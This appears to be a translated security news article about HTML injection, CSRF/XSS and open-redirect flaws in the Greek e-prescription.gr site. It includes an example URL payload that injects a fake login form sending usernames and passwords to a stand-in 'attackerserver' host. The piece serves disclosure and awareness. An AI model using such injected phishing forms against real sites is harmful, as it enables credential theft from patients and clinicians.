HomeRapidalerte-prescription.gr suffers from dangerous vulnerabilities

e-prescription.gr suffers from dangerous vulnerabilities

e-Prescription is the service is the new unified prescription system, running since 2013. With the e-Prescription system, EOPYY can "see" in real time the progress of the execution of a referral for a diagnostic test or treatment, from the moment a prescription is written, until the moment it is submitted to the diagnostic center or physiotherapy center.security e-prescription

The invoice is also uploaded to the system in PDF format. This way, the same referral cannot be executed a second time, while EOPYY can control and clear its expenses directly and entirely electronically without having to compare the actual document sheets.

e-prescription.gr suffers from dangerous vulnerabilities

At the same time, the system registers all the providers' medical devices and their technical characteristics, so every time a patient undergoes an examination, the system will know what capacity of the device it was performed on and the billing will be graded accordingly. (Information from SKAI)

Our friendly site iguru made a very serious revelation which we will present to you right away. We have mentioned Cross-Site Scripting. It is a very very dangerous vulnerability that can destroy your site, reputation and expose your users' data. If you don't believe this then no one can save you from your naivety.

Your entire infrastructure is at risk and it doesn't matter at all if you have Oracle as your database, JSP, ASP with SQL or if you have encryption protocols (HTTPS).

Unfortunately, security is not on the agenda of companies and organizations yet, but attacks are evolving at a rapid pace and hackers are at a better level than the defenders.

https://www.e-prescription.gr has more than one problem. I will mention a few:

  • HTML
  • CRSF
  • Unvalidated Redirect

What can the attacker do?

  • To steal the user's Session Id
  • Record mouse and keyboard movements
  • To steal files from the attacker's computer
  • To carry out DDoS attacks
  • To attack the Intranet
  • Create XSS Shell

1st Attack Scenario (Client) – HTMLi

e-prescription.gr suffers from dangerous vulnerabilities

The attacker wants to steal users' passwords and in this scenario he will use phishing techniques that, with the help of social media, will not be difficult to trick you.

What can it do with HTMLi?
The link below explains the vulnerability without leading to an actual path that exposes the security hole. (So you don't need to try it because you will get a 404).

https://www.e-prescription.gr/vulnerable.php,asp,jsp?name=<h3> Please enter your Username and Password.</h3><form method=”POST” action=”https://attackerserver/login.php”> User name:<input type=”text” name=”username” /><br /> Code:<input type=”password” name=”password” /><br /><input type=”submit” value=”Login” /></form>

If you are a little familiar with HTML, you will have no difficulty understanding how a form has been created with two fields and a button to send your data to the attacker's site.

2nd Attack Scenario (Administrator) – CSRF

e-prescription.gr suffers from dangerous vulnerabilities

In this scenario, the attacker is not interested in the users but in the Administrator. He finds the vulnerability on the site and using CSRF manages to communicate with his WebServer.

When the administrator looks at the Log File then the script is executed and strange things can happen. For example:

  • Find the path of the log file
  • Get the sessionID of the admin

I will show you with the help of Owasp Mutillidae how it can be achieved and it is no different from the real problem of E-prescription

We find the problem and insert the malicious code and not just a
3 e-prescriptions

3

The administrator logs in to view the Log file

4
4 e-prescription and a POST request was made to the hacker's server. Now I know where the log file is located but of course many more scenarios can happen.

Also consider if there is XSS for example in the forum with this specific attack what could happen.

3rd Attack Scenario (Redirection)6 e-prescription

6

In this scenario, the attacker is not interested in e-prescription but wants your help to transfer you to his site. For example, he sends you an image that looks like this:

Untitled
When you are transferred to the site with the help of e-prescription, it will not be difficult for malware to be downloaded to your computer or something else to happen to you. It would be good to avoid redirects through your site. A gap is enough to bring down a site like E-prescription and expose sensitive data.

As we mentioned above, for reasons of protection of the National Prescription website and to prevent it from being used by malicious users, we do not publish the PoC, which we have at our disposal.

source: iguru

📧
Subscribe to the SecNews Newsletter

The most important Security & Technology news in your Inbox.

SEARCH

FOLLOW US

📧
Newsletter SecNews
The most important Security & Technology news in your inbox.

LIVE NEWS